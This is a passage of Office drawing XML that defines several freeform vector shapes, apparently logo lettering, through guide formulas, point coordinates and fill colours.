                      <a:pt x="313" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="94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0060A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1" name="Freeform 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{470230DF-AE9E-2A4D-A2D4-6D94AB8BEF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1113" y="1116013"/>
                <a:ext cx="274638" cy="225425"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 112 w 518"/>
                  <a:gd name="T1" fmla="*/ 0 h 426"/>
                  <a:gd name="T2" fmla="*/ 408 w 518"/>
                  <a:gd name="T3" fmla="*/ 0 h 426"/>
                  <a:gd name="T4" fmla="*/ 431 w 518"/>
                  <a:gd name="T5" fmla="*/ 0 h 426"/>
                  <a:gd name="T6" fmla="*/ 455 w 518"/>
                  <a:gd name="T7" fmla="*/ 3 h 426"/>
                  <a:gd name="T8" fmla="*/ 474 w 518"/>
                  <a:gd name="T9" fmla="*/ 9 h 426"/>
                  <a:gd name="T10" fmla="*/ 492 w 518"/>
                  <a:gd name="T11" fmla="*/ 18 h 426"/>
                  <a:gd name="T12" fmla="*/ 505 w 518"/>
                  <a:gd name="T13" fmla="*/ 30 h 426"/>
                  <a:gd name="T14" fmla="*/ 514 w 518"/>
                  <a:gd name="T15" fmla="*/ 45 h 426"/>
                  <a:gd name="T16" fmla="*/ 518 w 518"/>
                  <a:gd name="T17" fmla="*/ 64 h 426"/>
                  <a:gd name="T18" fmla="*/ 518 w 518"/>
                  <a:gd name="T19" fmla="*/ 86 h 426"/>
                  <a:gd name="T20" fmla="*/ 514 w 518"/>
                  <a:gd name="T21" fmla="*/ 115 h 426"/>
                  <a:gd name="T22" fmla="*/ 433 w 518"/>
                  <a:gd name="T23" fmla="*/ 426 h 426"/>
                  <a:gd name="T24" fmla="*/ 264 w 518"/>
                  <a:gd name="T25" fmla="*/ 426 h 426"/>
                  <a:gd name="T26" fmla="*/ 337 w 518"/>
                  <a:gd name="T27" fmla="*/ 144 h 426"/>
                  <a:gd name="T28" fmla="*/ 342 w 518"/>
                  <a:gd name="T29" fmla="*/ 126 h 426"/>
                  <a:gd name="T30" fmla="*/ 340 w 518"/>
                  <a:gd name="T31" fmla="*/ 112 h 426"/>
                  <a:gd name="T32" fmla="*/ 335 w 518"/>
                  <a:gd name="T33" fmla="*/ 101 h 426"/>
                  <a:gd name="T34" fmla="*/ 324 w 518"/>
                  <a:gd name="T35" fmla="*/ 95 h 426"/>
                  <a:gd name="T36" fmla="*/ 308 w 518"/>
                  <a:gd name="T37" fmla="*/ 94 h 426"/>
                  <a:gd name="T38" fmla="*/ 254 w 518"/>
                  <a:gd name="T39" fmla="*/ 94 h 426"/>
                  <a:gd name="T40" fmla="*/ 169 w 518"/>
                  <a:gd name="T41" fmla="*/ 426 h 426"/>
                  <a:gd name="T42" fmla="*/ 0 w 518"/>
                  <a:gd name="T43" fmla="*/ 426 h 426"/>
                  <a:gd name="T44" fmla="*/ 68 w 518"/>
                  <a:gd name="T45" fmla="*/ 164 h 426"/>
                  <a:gd name="T46" fmla="*/ 244 w 518"/>
                  <a:gd name="T47" fmla="*/ 94 h 426"/>
                  <a:gd name="T48" fmla="*/ 87 w 518"/>
                  <a:gd name="T49" fmla="*/ 94 h 426"/>
                  <a:gd name="T50" fmla="*/ 112 w 518"/>
                  <a:gd name="T51" fmla="*/ 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18" h="426">
                    <a:moveTo>
                      <a:pt x="112" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="408" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="518" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="518" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="9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60A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2" name="Freeform 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1235CA96-F1D3-A64F-B7EB-A28BB2AFC6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1875" y="1116013"/>
                <a:ext cx="261938" cy="225425"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 232 w 495"/>
                  <a:gd name="T1" fmla="*/ 94 h 426"/>
                  <a:gd name="T2" fmla="*/ 213 w 495"/>
                  <a:gd name="T3" fmla="*/ 164 h 426"/>
                  <a:gd name="T4" fmla="*/ 310 w 495"/>
                  <a:gd name="T5" fmla="*/ 164 h 426"/>
                  <a:gd name="T6" fmla="*/ 314 w 495"/>
                  <a:gd name="T7" fmla="*/ 144 h 426"/>
                  <a:gd name="T8" fmla="*/ 318 w 495"/>
                  <a:gd name="T9" fmla="*/ 126 h 426"/>
                  <a:gd name="T10" fmla="*/ 317 w 495"/>
                  <a:gd name="T11" fmla="*/ 112 h 426"/>
                  <a:gd name="T12" fmla="*/ 311 w 495"/>
                  <a:gd name="T13" fmla="*/ 101 h 426"/>
                  <a:gd name="T14" fmla="*/ 301 w 495"/>
                  <a:gd name="T15" fmla="*/ 95 h 426"/>
                  <a:gd name="T16" fmla="*/ 285 w 495"/>
                  <a:gd name="T17" fmla="*/ 94 h 426"/>
                  <a:gd name="T18" fmla="*/ 232 w 495"/>
                  <a:gd name="T19" fmla="*/ 94 h 426"/>
                  <a:gd name="T20" fmla="*/ 166 w 495"/>
                  <a:gd name="T21" fmla="*/ 0 h 426"/>
                  <a:gd name="T22" fmla="*/ 384 w 495"/>
                  <a:gd name="T23" fmla="*/ 0 h 426"/>
                  <a:gd name="T24" fmla="*/ 408 w 495"/>
                  <a:gd name="T25" fmla="*/ 0 h 426"/>
                  <a:gd name="T26" fmla="*/ 431 w 495"/>
                  <a:gd name="T27" fmla="*/ 3 h 426"/>
                  <a:gd name="T28" fmla="*/ 450 w 495"/>
                  <a:gd name="T29" fmla="*/ 9 h 426"/>
                  <a:gd name="T30" fmla="*/ 468 w 495"/>
                  <a:gd name="T31" fmla="*/ 18 h 426"/>
                  <a:gd name="T32" fmla="*/ 481 w 495"/>
                  <a:gd name="T33" fmla="*/ 30 h 426"/>
                  <a:gd name="T34" fmla="*/ 490 w 495"/>
                  <a:gd name="T35" fmla="*/ 45 h 426"/>
                  <a:gd name="T36" fmla="*/ 495 w 495"/>
                  <a:gd name="T37" fmla="*/ 64 h 426"/>
                  <a:gd name="T38" fmla="*/ 495 w 495"/>
                  <a:gd name="T39" fmla="*/ 86 h 426"/>
                  <a:gd name="T40" fmla="*/ 490 w 495"/>
                  <a:gd name="T41" fmla="*/ 115 h 426"/>
                  <a:gd name="T42" fmla="*/ 452 w 495"/>
                  <a:gd name="T43" fmla="*/ 260 h 426"/>
                  <a:gd name="T44" fmla="*/ 188 w 495"/>
                  <a:gd name="T45" fmla="*/ 260 h 426"/>
                  <a:gd name="T46" fmla="*/ 183 w 495"/>
                  <a:gd name="T47" fmla="*/ 280 h 426"/>
                  <a:gd name="T48" fmla="*/ 179 w 495"/>
                  <a:gd name="T49" fmla="*/ 299 h 426"/>
                  <a:gd name="T50" fmla="*/ 181 w 495"/>
                  <a:gd name="T51" fmla="*/ 314 h 426"/>
                  <a:gd name="T52" fmla="*/ 186 w 495"/>
                  <a:gd name="T53" fmla="*/ 324 h 426"/>
                  <a:gd name="T54" fmla="*/ 197 w 495"/>
                  <a:gd name="T55" fmla="*/ 330 h 426"/>
                  <a:gd name="T56" fmla="*/ 211 w 495"/>
                  <a:gd name="T57" fmla="*/ 332 h 426"/>
                  <a:gd name="T58" fmla="*/ 440 w 495"/>
                  <a:gd name="T59" fmla="*/ 332 h 426"/>
                  <a:gd name="T60" fmla="*/ 415 w 495"/>
                  <a:gd name="T61" fmla="*/ 426 h 426"/>
                  <a:gd name="T62" fmla="*/ 116 w 495"/>
                  <a:gd name="T63" fmla="*/ 426 h 426"/>
                  <a:gd name="T64" fmla="*/ 91 w 495"/>
                  <a:gd name="T65" fmla="*/ 426 h 426"/>
                  <a:gd name="T66" fmla="*/ 68 w 495"/>
                  <a:gd name="T67" fmla="*/ 421 h 426"/>
                  <a:gd name="T68" fmla="*/ 47 w 495"/>
                  <a:gd name="T69" fmla="*/ 417 h 426"/>
                  <a:gd name="T70" fmla="*/ 31 w 495"/>
                  <a:gd name="T71" fmla="*/ 408 h 426"/>
                  <a:gd name="T72" fmla="*/ 16 w 495"/>
                  <a:gd name="T73" fmla="*/ 396 h 426"/>
                  <a:gd name="T74" fmla="*/ 6 w 495"/>
                  <a:gd name="T75" fmla="*/ 381 h 426"/>
                  <a:gd name="T76" fmla="*/ 0 w 495"/>
                  <a:gd name="T77" fmla="*/ 362 h 426"/>
                  <a:gd name="T78" fmla="*/ 0 w 495"/>
                  <a:gd name="T79" fmla="*/ 338 h 426"/>
                  <a:gd name="T80" fmla="*/ 4 w 495"/>
                  <a:gd name="T81" fmla="*/ 309 h 426"/>
                  <a:gd name="T82" fmla="*/ 43 w 495"/>
                  <a:gd name="T83" fmla="*/ 164 h 426"/>
                  <a:gd name="T84" fmla="*/ 220 w 495"/>
                  <a:gd name="T85" fmla="*/ 94 h 426"/>
                  <a:gd name="T86" fmla="*/ 62 w 495"/>
                  <a:gd name="T87" fmla="*/ 94 h 426"/>
                  <a:gd name="T88" fmla="*/ 70 w 495"/>
                  <a:gd name="T89" fmla="*/ 64 h 426"/>
                  <a:gd name="T90" fmla="*/ 84 w 495"/>
                  <a:gd name="T91" fmla="*/ 42 h 426"/>
                  <a:gd name="T92" fmla="*/ 98 w 495"/>
                  <a:gd name="T93" fmla="*/ 24 h 426"/>
                  <a:gd name="T94" fmla="*/ 113 w 495"/>
                  <a:gd name="T95" fmla="*/ 12 h 426"/>
                  <a:gd name="T96" fmla="*/ 131 w 495"/>
                  <a:gd name="T97" fmla="*/ 4 h 426"/>
                  <a:gd name="T98" fmla="*/ 148 w 495"/>
                  <a:gd name="T99" fmla="*/ 1 h 426"/>
                  <a:gd name="T100" fmla="*/ 166 w 495"/>
                  <a:gd name="T101" fmla="*/ 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95" h="426">
                    <a:moveTo>
                      <a:pt x="232" y="94"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="213" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="94"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="166" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="384" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0060A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3" name="Freeform 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F32750E-2AFC-834F-B493-74126DCC160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76600" y="1049338"/>
                <a:ext cx="315913" cy="292100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 299 w 596"/>
                  <a:gd name="T1" fmla="*/ 95 h 551"/>
                  <a:gd name="T2" fmla="*/ 255 w 596"/>
                  <a:gd name="T3" fmla="*/ 259 h 551"/>
                  <a:gd name="T4" fmla="*/ 323 w 596"/>
                  <a:gd name="T5" fmla="*/ 259 h 551"/>
                  <a:gd name="T6" fmla="*/ 342 w 596"/>
                  <a:gd name="T7" fmla="*/ 257 h 551"/>
                  <a:gd name="T8" fmla="*/ 358 w 596"/>
                  <a:gd name="T9" fmla="*/ 251 h 551"/>
                  <a:gd name="T10" fmla="*/ 370 w 596"/>
                  <a:gd name="T11" fmla="*/ 241 h 551"/>
                  <a:gd name="T12" fmla="*/ 379 w 596"/>
                  <a:gd name="T13" fmla="*/ 225 h 551"/>
                  <a:gd name="T14" fmla="*/ 386 w 596"/>
                  <a:gd name="T15" fmla="*/ 204 h 551"/>
                  <a:gd name="T16" fmla="*/ 401 w 596"/>
                  <a:gd name="T17" fmla="*/ 150 h 551"/>
                  <a:gd name="T18" fmla="*/ 404 w 596"/>
                  <a:gd name="T19" fmla="*/ 129 h 551"/>
                  <a:gd name="T20" fmla="*/ 404 w 596"/>
                  <a:gd name="T21" fmla="*/ 113 h 551"/>
                  <a:gd name="T22" fmla="*/ 396 w 596"/>
                  <a:gd name="T23" fmla="*/ 103 h 551"/>
                  <a:gd name="T24" fmla="*/ 384 w 596"/>
                  <a:gd name="T25" fmla="*/ 97 h 551"/>
                  <a:gd name="T26" fmla="*/ 367 w 596"/>
                  <a:gd name="T27" fmla="*/ 95 h 551"/>
                  <a:gd name="T28" fmla="*/ 299 w 596"/>
                  <a:gd name="T29" fmla="*/ 95 h 551"/>
                  <a:gd name="T30" fmla="*/ 66 w 596"/>
                  <a:gd name="T31" fmla="*/ 0 h 551"/>
                  <a:gd name="T32" fmla="*/ 472 w 596"/>
                  <a:gd name="T33" fmla="*/ 0 h 551"/>
                  <a:gd name="T34" fmla="*/ 494 w 596"/>
                  <a:gd name="T35" fmla="*/ 0 h 551"/>
                  <a:gd name="T36" fmla="*/ 515 w 596"/>
                  <a:gd name="T37" fmla="*/ 3 h 551"/>
                  <a:gd name="T38" fmla="*/ 536 w 596"/>
                  <a:gd name="T39" fmla="*/ 7 h 551"/>
                  <a:gd name="T40" fmla="*/ 553 w 596"/>
                  <a:gd name="T41" fmla="*/ 15 h 551"/>
                  <a:gd name="T42" fmla="*/ 569 w 596"/>
                  <a:gd name="T43" fmla="*/ 25 h 551"/>
                  <a:gd name="T44" fmla="*/ 583 w 596"/>
                  <a:gd name="T45" fmla="*/ 39 h 551"/>
                  <a:gd name="T46" fmla="*/ 591 w 596"/>
                  <a:gd name="T47" fmla="*/ 55 h 551"/>
                  <a:gd name="T48" fmla="*/ 596 w 596"/>
                  <a:gd name="T49" fmla="*/ 76 h 551"/>
                  <a:gd name="T50" fmla="*/ 596 w 596"/>
                  <a:gd name="T51" fmla="*/ 100 h 551"/>
                  <a:gd name="T52" fmla="*/ 591 w 596"/>
                  <a:gd name="T53" fmla="*/ 128 h 551"/>
                  <a:gd name="T54" fmla="*/ 562 w 596"/>
                  <a:gd name="T55" fmla="*/ 237 h 551"/>
                  <a:gd name="T56" fmla="*/ 550 w 596"/>
                  <a:gd name="T57" fmla="*/ 271 h 551"/>
                  <a:gd name="T58" fmla="*/ 534 w 596"/>
                  <a:gd name="T59" fmla="*/ 299 h 551"/>
                  <a:gd name="T60" fmla="*/ 514 w 596"/>
                  <a:gd name="T61" fmla="*/ 321 h 551"/>
                  <a:gd name="T62" fmla="*/ 490 w 596"/>
                  <a:gd name="T63" fmla="*/ 339 h 551"/>
                  <a:gd name="T64" fmla="*/ 465 w 596"/>
                  <a:gd name="T65" fmla="*/ 351 h 551"/>
                  <a:gd name="T66" fmla="*/ 437 w 596"/>
                  <a:gd name="T67" fmla="*/ 360 h 551"/>
                  <a:gd name="T68" fmla="*/ 406 w 596"/>
                  <a:gd name="T69" fmla="*/ 365 h 551"/>
                  <a:gd name="T70" fmla="*/ 376 w 596"/>
                  <a:gd name="T71" fmla="*/ 365 h 551"/>
                  <a:gd name="T72" fmla="*/ 233 w 596"/>
                  <a:gd name="T73" fmla="*/ 365 h 551"/>
                  <a:gd name="T74" fmla="*/ 229 w 596"/>
                  <a:gd name="T75" fmla="*/ 365 h 551"/>
                  <a:gd name="T76" fmla="*/ 180 w 596"/>
                  <a:gd name="T77" fmla="*/ 551 h 551"/>
                  <a:gd name="T78" fmla="*/ 0 w 596"/>
                  <a:gd name="T79" fmla="*/ 551 h 551"/>
                  <a:gd name="T80" fmla="*/ 0 w 596"/>
                  <a:gd name="T81" fmla="*/ 551 h 551"/>
                  <a:gd name="T82" fmla="*/ 100 w 596"/>
                  <a:gd name="T83" fmla="*/ 165 h 551"/>
                  <a:gd name="T84" fmla="*/ 286 w 596"/>
                  <a:gd name="T85" fmla="*/ 95 h 551"/>
                  <a:gd name="T86" fmla="*/ 41 w 596"/>
                  <a:gd name="T87" fmla="*/ 95 h 551"/>
                  <a:gd name="T88" fmla="*/ 66 w 596"/>
                  <a:gd name="T89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96" h="551">
                    <a:moveTo>
                      <a:pt x="299" y="95"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="255" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="95"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="66" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="472" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="553" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="550" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0060A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4" name="Freeform 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0434765B-5FCE-DE47-8799-F526F95DB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2475" y="1112838"/>
                <a:ext cx="187325" cy="230188"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 264 w 355"/>
                  <a:gd name="T1" fmla="*/ 0 h 434"/>
                  <a:gd name="T2" fmla="*/ 302 w 355"/>
                  <a:gd name="T3" fmla="*/ 2 h 434"/>
                  <a:gd name="T4" fmla="*/ 333 w 355"/>
                  <a:gd name="T5" fmla="*/ 11 h 434"/>
                  <a:gd name="T6" fmla="*/ 350 w 355"/>
                  <a:gd name="T7" fmla="*/ 32 h 434"/>
                  <a:gd name="T8" fmla="*/ 355 w 355"/>
                  <a:gd name="T9" fmla="*/ 66 h 434"/>
                  <a:gd name="T10" fmla="*/ 343 w 355"/>
                  <a:gd name="T11" fmla="*/ 119 h 434"/>
                  <a:gd name="T12" fmla="*/ 308 w 355"/>
                  <a:gd name="T13" fmla="*/ 92 h 434"/>
                  <a:gd name="T14" fmla="*/ 308 w 355"/>
                  <a:gd name="T15" fmla="*/ 58 h 434"/>
                  <a:gd name="T16" fmla="*/ 284 w 355"/>
                  <a:gd name="T17" fmla="*/ 44 h 434"/>
                  <a:gd name="T18" fmla="*/ 229 w 355"/>
                  <a:gd name="T19" fmla="*/ 41 h 434"/>
                  <a:gd name="T20" fmla="*/ 173 w 355"/>
                  <a:gd name="T21" fmla="*/ 46 h 434"/>
                  <a:gd name="T22" fmla="*/ 139 w 355"/>
                  <a:gd name="T23" fmla="*/ 62 h 434"/>
                  <a:gd name="T24" fmla="*/ 120 w 355"/>
                  <a:gd name="T25" fmla="*/ 92 h 434"/>
                  <a:gd name="T26" fmla="*/ 108 w 355"/>
                  <a:gd name="T27" fmla="*/ 136 h 434"/>
                  <a:gd name="T28" fmla="*/ 108 w 355"/>
                  <a:gd name="T29" fmla="*/ 168 h 434"/>
                  <a:gd name="T30" fmla="*/ 125 w 355"/>
                  <a:gd name="T31" fmla="*/ 183 h 434"/>
                  <a:gd name="T32" fmla="*/ 154 w 355"/>
                  <a:gd name="T33" fmla="*/ 187 h 434"/>
                  <a:gd name="T34" fmla="*/ 195 w 355"/>
                  <a:gd name="T35" fmla="*/ 188 h 434"/>
                  <a:gd name="T36" fmla="*/ 243 w 355"/>
                  <a:gd name="T37" fmla="*/ 193 h 434"/>
                  <a:gd name="T38" fmla="*/ 279 w 355"/>
                  <a:gd name="T39" fmla="*/ 200 h 434"/>
                  <a:gd name="T40" fmla="*/ 299 w 355"/>
                  <a:gd name="T41" fmla="*/ 220 h 434"/>
                  <a:gd name="T42" fmla="*/ 306 w 355"/>
                  <a:gd name="T43" fmla="*/ 254 h 434"/>
                  <a:gd name="T44" fmla="*/ 295 w 355"/>
                  <a:gd name="T45" fmla="*/ 310 h 434"/>
                  <a:gd name="T46" fmla="*/ 268 w 355"/>
                  <a:gd name="T47" fmla="*/ 374 h 434"/>
                  <a:gd name="T48" fmla="*/ 236 w 355"/>
                  <a:gd name="T49" fmla="*/ 412 h 434"/>
                  <a:gd name="T50" fmla="*/ 195 w 355"/>
                  <a:gd name="T51" fmla="*/ 428 h 434"/>
                  <a:gd name="T52" fmla="*/ 144 w 355"/>
                  <a:gd name="T53" fmla="*/ 434 h 434"/>
                  <a:gd name="T54" fmla="*/ 89 w 355"/>
                  <a:gd name="T55" fmla="*/ 434 h 434"/>
                  <a:gd name="T56" fmla="*/ 47 w 355"/>
                  <a:gd name="T57" fmla="*/ 430 h 434"/>
                  <a:gd name="T58" fmla="*/ 17 w 355"/>
                  <a:gd name="T59" fmla="*/ 416 h 434"/>
                  <a:gd name="T60" fmla="*/ 1 w 355"/>
                  <a:gd name="T61" fmla="*/ 394 h 434"/>
                  <a:gd name="T62" fmla="*/ 1 w 355"/>
                  <a:gd name="T63" fmla="*/ 355 h 434"/>
                  <a:gd name="T64" fmla="*/ 16 w 355"/>
                  <a:gd name="T65" fmla="*/ 299 h 434"/>
                  <a:gd name="T66" fmla="*/ 51 w 355"/>
                  <a:gd name="T67" fmla="*/ 325 h 434"/>
